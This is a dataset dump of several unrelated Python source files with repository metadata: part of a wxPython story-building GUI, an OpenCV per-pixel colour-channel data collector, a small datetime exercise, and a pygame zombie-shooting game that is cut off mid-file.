self.readableToTarget(target)\n\t\tself.dirty = True\n\t\t\n\n\tdef onSetDestination (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Story As', os.getcwd(), \"\", \\\n\t \t\t\t\t\t\t \"Web Page (*.html)|*.html\", \\\n\t\t\t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.destination = path\n\t\t\tself.dirty = True\n\t\t\tself.updateDestination()\n\t\t\tdialog.Destroy()\n\t\t\treturn True\n\t\t\t\n\t\tdialog.Destroy()\n\t\treturn False\t\t\n\n\t\t\t\t\n\tdef onBuild (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building your story...')\n\t\n\t\ttry:\n\t\t\tif self.project.build():\n\t\t\t\tpath = 'file://' + urllib.pathname2url(self.project.destination)\n\t\t\t\tpath = path.replace('file://///', 'file:///')\n\t\t\t\twx.LaunchDefaultBrowser(path)\t\n\t\t\t\tself.SetStatusText('Your story has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building your story')\n\t\t\t 
self.SetStatusText('')\n\n\tdef onProof (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building proofing copy...')\n\t\n\t\ttry:\n\t\t\tif self.project.proof():\t\n\t\t\t\tself.SetStatusText('Your proofing copy has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building a proofing copy of your story')\n\t\t\t self.SetStatusText('')", "repo_name": "factorypreset/twee", "sub_path": "twee/branches/1.5/lib/gui.py", "file_name": "gui.py", "file_ext": "py", "file_size_in_byte": 12936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "wx.Frame", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wx.Config", "line_number": 40, "usage_type": "call"}, {"api_name": "wx.FileHistory", "line_number": 41, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 46, "usage_type": "call"}, {"api_name": "wx.Frame.__init__", "line_number": 52, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.CLOSE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.CAPTION", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.SYSTEM_MENU", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.MINIMIZE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 79, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 86, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 90, "usage_type": "call"}, {"api_name": "wx.MenuBar", "line_number": 99, "usage_type": "call"}, {"api_name": "wx.EVT_UPDATE_UI", "line_number": 107, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 109, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 110, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 111, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 112, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 113, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 114, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 115, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 116, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 117, "usage_type": "call"}, {"api_name": "wx.ID_FILE1", "line_number": 117, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 118, "usage_type": "call"}, {"api_name": "wx.ID_FILE2", "line_number": 118, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 119, "usage_type": "call"}, {"api_name": "wx.ID_FILE3", "line_number": 119, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 120, "usage_type": "call"}, {"api_name": "wx.ID_FILE4", "line_number": 120, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 121, "usage_type": "call"}, {"api_name": "wx.ID_FILE5", "line_number": 121, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 122, "usage_type": 
"call"}, {"api_name": "wx.EVT_MENU", "line_number": 123, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 124, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 125, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 129, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 130, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 135, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 136, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 136, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 137, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 137, "usage_type": "attribute"}, {"api_name": "wx.ListBox", "line_number": 140, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 142, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 144, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 149, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 150, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 150, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 151, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 151, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 156, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 157, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 157, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 162, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 167, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 171, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 175, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 175, "usage_type": "attribute"}, {"api_name": "wx.Choice", "line_number": 177, "usage_type": "call"}, {"api_name": "wx.EVT_CHOICE", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 190, "usage_type": 
"attribute"}, {"api_name": "wx.EXPAND", "line_number": 190, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.NOT_FOUND", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 236, "usage_type": "call"}, {"api_name": "wx.ICON_QUESTION", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.YES_NO", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.NO_DEFAULT", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.ID_YES", "line_number": 238, "usage_type": "attribute"}, {"api_name": "wx.AboutDialogInfo", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.AboutBox", "line_number": 280, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 284, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 288, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 293, "usage_type": "call"}, {"api_name": "wx.FileDialog", "line_number": 303, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 303, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE1", "line_number": 315, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE2", "line_number": 317, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE3", "line_number": 319, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE4", "line_number": 321, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE5", "line_number": 323, "usage_type": "attribute"}, {"api_name": "project.Project", "line_number": 331, "usage_type": "call"}, {"api_name": "wx.MessageBox", "line_number": 334, "usage_type": "call"}, {"api_name": "wx.ICON_ERROR", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 355, "usage_type": "call"}, {"api_name": "wx.MessageDialog", "line_number": 359, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.ICON_ERROR", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 364, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 364, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 366, "usage_type": "attribute"}, {"api_name": 
"wx.FD_CHANGE_DIR", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 368, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 394, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 394, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 397, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 420, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 420, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 424, "usage_type": "attribute"}, {"api_name": "urllib.pathname2url", "line_number": 445, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 447, "usage_type": "call"}]} +{"seq_id": "34184206592", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom tqdm import tqdm\n\nclass channel_visualizer():\n def __init__(self, input_video_path, outpath, colorspace = 'ycrbr', win_size=60, plot_W = 640, plot_H = 480):\n self.win_size = win_size\n self.plot_W = plot_W\n self.plot_H = plot_H\n \n try:\n self.input_capture = cv2.VideoCapture(input_video_path)\n except:\n raise ValueError('Input video path %s not valid' % input_video_path)\n \n if self.input_capture is not None: \n self.tot_input_vid_frames = int(self.input_capture.get(cv2.CAP_PROP_FRAME_COUNT)) \n self.input_cap_fps = int(self.input_capture.get(cv2.CAP_PROP_FPS))\n self.W , self.H = int(self.input_capture.get(3)), int(self.input_capture.get(4)) #input video dimensions\n else:\n raise ValueError(\"Invalid input video\")\n \n self.chan1 = []\n self.chan2 = []\n self.chan3 = []\n\n self.chan12 = []\n self.chan13 = []\n self.chan23 = []\n\n self.num_pixels = self.W * self.H\n for i in range(self.num_pixels):\n self.chan1.append([])\n self.chan2.append([])\n self.chan3.append([])\n self.chan12.append([])\n self.chan23.append([])\n self.chan13.append([])\n\n self.colorspace = colorspace\n if colorspace == 'ycrbr':\n self.chan1_name = 'Y'\n self.chan2_name = 'Cr'\n self.chan3_name = 'Br'\n print('YCrBr analysis')\n elif colorspace == 'bgr':\n self.chan1_name = 'B'\n self.chan2_name = 'G'\n self.chan3_name = 'R'\n\n self.frame_num = 0\n\n self.outpath = outpath\n self.input_vid_name = 'mp_' + input_video_path.split('/')[-1][:-4]\n \n \n def run(self):\n \"\"\"\n process the input video!\n \"\"\"\n\n #generate data\n with tqdm(total=self.tot_input_vid_frames) as pbar:\n pbar.set_description('Generating color channel visualization data')\n while self.input_capture.isOpened():\n ret, frame = self.input_capture.read()\n if ret:\n self.frame_num += 1\n if self.chan1_name == 'Y':\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2YCR_CB)\n for i in range(self.num_pixels):\n r = int(i / self.W)\n c = i % self.W\n self.chan1[i].append(frame[r, c, 0])\n self.chan2[i].append(frame[r, c, 1])\n self.chan3[i].append(frame[r, c, 2])\n self.chan12[i].append(frame[r, c, 0] / frame[r, c, 1])\n self.chan13[i].append(frame[r, c, 0] / frame[r, c, 
2])\n self.chan23[i].append(frame[r, c, 1] / frame[r, c, 2])\n else:\n break\n pbar.update(1)\n for i in range(900):\n print(self.chan1[i][10])\n #save all data\n with open(f'{self.outpath}/{self.colorspace}_{self.input_vid_name}_pixelwise_channel_data.pkl','wb') as f:\n data_dict = {\n 'chan1':self.chan1, \n 'chan2':self.chan2, \n 'chan3':self.chan3, \n 'chan12':self.chan12,\n 'chan13':self.chan13,\n 'chan23':self.chan23,\n }\n pickle.dump(data_dict, f)\n\n ", "repo_name": "Hadleigh-Schwartz/deepfake_detection", "sub_path": "evm_experiments/vis_channels_pixelwise.py", "file_name": "vis_channels_pixelwise.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2YCR_CB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "6654316188", "text": "# importing datetime module\n\nimport datetime\nimport time\nfrom datetime import timedelta\n\n#### display the current time in UNIX format\n\n# assigned regular string date\ndate_time = datetime.datetime(2023, 1, 26, 15, 20)\n \n # print regular python date&time\nprint(\"date_time =>\",date_time)\n\n \n# displaying unix timestamp after conversion\nprint(\"unix_timestamp => \",\n (time.mktime(date_time.timetuple())))\n\n#######\n####### calculate the time from today until a given date, outputs the delta\ntime_now = datetime.datetime.now()\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1) \n\n# What day will it be after 180 days\nfuture_date2 = time_now + timedelta(days=189)\nprint(future_date2)\n\n# What day would it have been 150 days ago\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1)\n\n\n\n", "repo_name": "mathiasgrosse/Best_GroupDCI", "sub_path": "unixformat.py", "file_name": "unixformat.py", "file_ext": "py", "file_size_in_byte": 802, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 10, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "35044616496", "text": "import pygame, sys\nfrom pygame import mixer\nimport random\nimport math\n\npygame.init()\nmixer.init()\npygame.font.init()\n\n# CONSTANTS\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = (int)(SCREEN_WIDTH * 0.8)\nBG = (105, 105, 105)\nBG_IMAGE = pygame.image.load('misc/bg_image.jpg')\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nFPS = 60\n\n#ICON\nprogramIcon = pygame.image.load('misc/icon.png')\npygame.display.set_icon(programIcon)\n\noriginal_wizard1image = pygame.image.load('good/wizard1.png')\noriginal_wizard2image = 
pygame.image.load('good/wizard2.png')\noriginal_zombieimage = pygame.image.load('bad/zombie.png')\n\n# MUSIC CONSTANTS\nmain_menu_music = pygame.mixer.Sound('music/main_menu.mp3')\nmain_menu_music.set_volume(1)\n# funny_bit, retro_platforming, castle_of_fear\nmusic = pygame.mixer.Sound('music/funny_bit.mp3')\nmusic.set_volume(0.7)\nlaser_sfx = pygame.mixer.Sound('music/lasersfx.wav')\nlaser_sfx.set_volume(0.5)\n\n# FONT CONSTANTS\nfont_score = pygame.font.Font('misc/8-bit Arcade In.ttf', 100)\nfont = pygame.font.Font('misc/8-bit Arcade In.ttf', 35)\nfont_gameover = pygame.font.Font('misc/8-bit Arcade In.ttf', 200)\n\n# DISPLAY\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Laser-Bound\")\n\n# DEFINE PLAYER ACTION VARIBALES\none_moving_left = False\none_moving_right = False\none_moving_up = False\none_moving_down = False\n\ntwo_moving_left = False\ntwo_moving_right = False\ntwo_moving_up = False\ntwo_moving_down = False\n\n\nclass Character(pygame.sprite.Sprite):\n def __init__(self, number, x, y, scale, speed):\n self.speed = speed\n self.scale = scale\n self.number = number\n\n image = pygame.image.load(f'good/wizard{number}.png').convert_alpha()\n self.image = pygame.transform.scale(image, (int(image.get_width() * scale), int(image.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self, moving_left, moving_right, moving_up, moving_down):\n # promjena x i y koordinate\n dx = 0\n dy = 0\n\n if moving_left:\n if self.rect.left > 0:\n dx = -self.speed\n if moving_right:\n if self.rect.right < SCREEN_WIDTH:\n dx = self.speed\n if moving_up:\n if self.rect.top > 0:\n dy = -self.speed\n if moving_down:\n if self.rect.bottom < SCREEN_HEIGHT:\n dy = self.speed\n\n # update rectangle position\n self.rect.x += dx\n self.rect.y += dy\n\n def draw(self):\n if self.number == '1':\n main = (main1.rect.center)\n secondary = (main2.rect.center)\n else:\n main = (main2.rect.center)\n secondary = (main1.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * - math.atan2(ang_y, ang_x) - 90\n if self.number == '1':\n self.image = pygame.transform.rotozoom(original_wizard1image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n else:\n self.image = pygame.transform.rotozoom(original_wizard2image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\n\nclass Zombie(pygame.sprite.Sprite):\n def __init__(self, x, y, scale, speed):\n pygame.sprite.Sprite.__init__(self, zombie_group)\n self.speed = speed\n self.check = 0\n self.num = random.choice(main)\n self.scale = scale\n\n img = pygame.image.load('bad/zombie.png').convert_alpha()\n self.image = pygame.transform.scale(img, (int(img.get_width() * scale), int(img.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self):\n dx = self.speed\n dy = self.speed\n\n if self.rect.x > self.num.rect.x:\n self.rect.x += -dx\n else:\n self.rect.x += dx\n\n if self.rect.y > self.num.rect.y:\n self.rect.y += -dy\n else:\n self.rect.y += dy\n\n #self.check += 1\n\n # collision with player\n if self.rect.colliderect(main1) or self.rect.colliderect(main2):\n gameover()\n #pygame.display.quit()\n\n\n def draw(self):\n if self.num == main1:\n main = (self.rect.center)\n secondary = (main1.rect.center)\n else:\n main = (self.rect.center)\n secondary = (main2.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * 
-math.atan2(ang_y, ang_x) - 270\n self.image = pygame.transform.rotozoom(original_zombieimage, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\ndef draw_bg():\n screen.fill(BG)\n screen.blit(BG_IMAGE, (0, 0))\n\ndef draw_tutorial():\n wasd_blue = pygame.image.load('misc/wasd.png')\n wasd_red = pygame.image.load('misc/arrowkeys.png')\n wasd_blue = pygame.transform.scale(wasd_blue, (wasd_blue.get_width() * 0.3, wasd_blue.get_height() * 0.3))\n wasd_red = pygame.transform.scale(wasd_red, (wasd_red.get_width() * 0.3, wasd_red.get_height() * 0.3))\n screen.blit(wasd_blue, (main1.rect.centerx - 55, main1.rect.centery - 100))\n screen.blit(wasd_red, (main2.rect.centerx - 55, main2.rect.centery - 100))\n\ndef distance_point_line(pt, l1, l2):\n NV = pygame.math.Vector2(l1[1] - l2[1], l2[0] - l1[0])\n LP = pygame.math.Vector2(l1) # moze i l2\n P = pygame.math.Vector2(pt)\n return abs(\n NV.normalize().dot(P - LP)) # dot je mnozenje vektora sa skalarom. P-LP je smjer koji main1 ima prema zombie\n\ndef fade(width, height, button_play, button_exit, logo):\n fade = pygame.Surface((width, height))\n fade.fill((0, 0, 0))\n for alpha in range(300):\n fade.set_alpha(alpha)\n draw_bg()\n screen.blit(button_play, (100, 400))\n screen.blit(button_exit, (550, 400))\n screen.blit(logo, (100, 200))\n screen.blit(fade, (0,0))\n pygame.display.update()\n pygame.time.delay(1)\n\ndef gameover():\n score_text = font_gameover.render(str(getScore()), False, WHITE)\n highscore_text = font_gameover.render(str(getHighscore()), False, WHITE)\n gameover_menu = pygame.image.load(\"misc/gameover_img.png\")\n button_restart = pygame.image.load(\"ui/button_restart.png\")\n button_restart_hover = pygame.image.load(\"ui/button_restart_hover.png\")\n button_exit = pygame.image.load(\"ui/button_gameover_exit.png\")\n button_exit_hover = pygame.image.load(\"ui/button_gameover_exit_hover.png\")\n\n global click\n\n screen.blit(gameover_menu, (250, 100))\n screen.blit(score_text, (335, 365))\n screen.blit(highscore_text, (570, 365))\n\n gameover = True\n while gameover:\n mx, my = pygame.mouse.get_pos()\n\n screen.blit(button_restart, (285, 550))\n button_restart_rect = pygame.Rect(285, 550, 230, 90)\n if button_restart_rect.collidepoint((mx, my)):\n screen.blit(button_restart_hover, (285, 550))\n if click:\n for zombie in zombie_group:\n zombie.kill()\n gameover = False\n screen.blit(button_exit, (550, 550))\n button_exit_rect = pygame.Rect(550, 550, 148, 90)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 550))\n if click:\n pygame.exit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n music.stop()\n game()\n\ndef pause():\n global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n\n paused_img = pygame.image.load(\"misc/paused_img.png\")\n screen.blit(paused_img, (0, 0))\n\n music.set_volume(0.2)\n\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n one_moving_up = False\n one_moving_down = False\n one_moving_left = False\n one_moving_right = False\n two_moving_up = False\n two_moving_down = False\n two_moving_left = False\n two_moving_right = False\n pause = False\n 
pygame.display.update()\n music.set_volume(1)\n\n# GROUPS\nzombie_group = pygame.sprite.Group()\n\nscore = 0\nhighscore = 0\ndef setScore():\n global score\n score += 1\ndef getScore():\n global score\n return score\n\ndef getHighscore():\n global score, highscore\n if score > highscore:\n highscore = score\n return highscore\n\ndef setScoree():\n global score\n score = 0\n# ----------------------------------------------------- MAIN ----------------------------------------------------------\n\nclock = pygame.time.Clock()\nclick = False\nmusicB = True\n\n# Character(number, x, y, scale, speed)\nmain1 = Character('1', 400, 400, 1, 3)\nmain2 = Character('2', 600, 400, 1, 3)\nmain = [main1, main2]\n\ndef game():\n max_zombie_timer = 300\n zombie_timer = 0 # 5 sekundi jer 300/FPS = 5, FPS = 60\n score = 0\n setScoree()\n tutorial_timer = 300\n\n global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n one_moving_up = False\n one_moving_down = False\n one_moving_left = False\n one_moving_right = False\n two_moving_up = False\n two_moving_down = False\n two_moving_left = False\n two_moving_right = False\n\n global main1, main2\n global main\n main1 = Character('1', 400, 400, 1, 3)\n main2 = Character('2', 600, 400, 1, 3)\n main = [main1, main2]\n\n first_time = True\n\n main_menu_music.stop()\n music.play(-1, 0, 0)\n\n run = True\n while run:\n clock.tick(FPS)\n draw_bg()\n\n if first_time:\n if tutorial_timer > 0:\n draw_tutorial()\n if tutorial_timer == 0:\n first_time = False\n tutorial_timer -= 1\n\n score_text = font_score.render(str(score), False, WHITE)\n screen.blit(score_text, (30, 1))\n\n main1.draw()\n main2.draw()\n\n main1.move(one_moving_left, one_moving_right, one_moving_up, one_moving_down)\n main2.move(two_moving_left, two_moving_right, two_moving_up, two_moving_down)\n\n laser = pygame.draw.line(screen, WHITE, (main1.rect.centerx + 12, main1.rect.centery + 10), (main2.rect.centerx - 25, main2.rect.centery + 10), 6)\n\n\n # Zombie(x, y, scale, speed)\n if zombie_timer == max_zombie_timer:\n # za koliko ce enemy biti spawnan van ekrana = 10\n ran = random.randint(1, 4)\n if ran == 1:\n zombie = Zombie((SCREEN_WIDTH + 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n if ran == 2:\n zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (-10), 0.8, 1)\n if ran == 3:\n zombie = Zombie((SCREEN_WIDTH - 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n if ran == 4:\n zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (SCREEN_HEIGHT + 10), 0.8, 1)\n zombie_group.add(zombie)\n max_zombie_timer -= 10\n zombie_timer = 0\n zombie_timer += 1\n\n zombie_group.draw(screen)\n for zombie in zombie_group:\n zombie.move()\n zombie.draw()\n if laser.collidepoint(zombie.rect.center) and distance_point_line(zombie.rect.center, main1.rect.center,\n main2.rect.center) < 10:\n laser_sfx.play(1, 0, 0)\n zombie.kill()\n setScore()\n score += 1\n\n # quit\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n # keyboard presses\n\n if event.type == pygame.KEYDOWN:\n # movement\n if event.key == pygame.K_a:\n one_moving_left = True\n if event.key == pygame.K_d:\n one_moving_right = True\n if event.key == pygame.K_w:\n one_moving_up = True\n if event.key == pygame.K_s:\n one_moving_down = True\n\n if event.key == pygame.K_LEFT:\n two_moving_left = True\n if event.key == pygame.K_RIGHT:\n two_moving_right = True\n if event.key == pygame.K_UP:\n two_moving_up = True\n if event.key == 
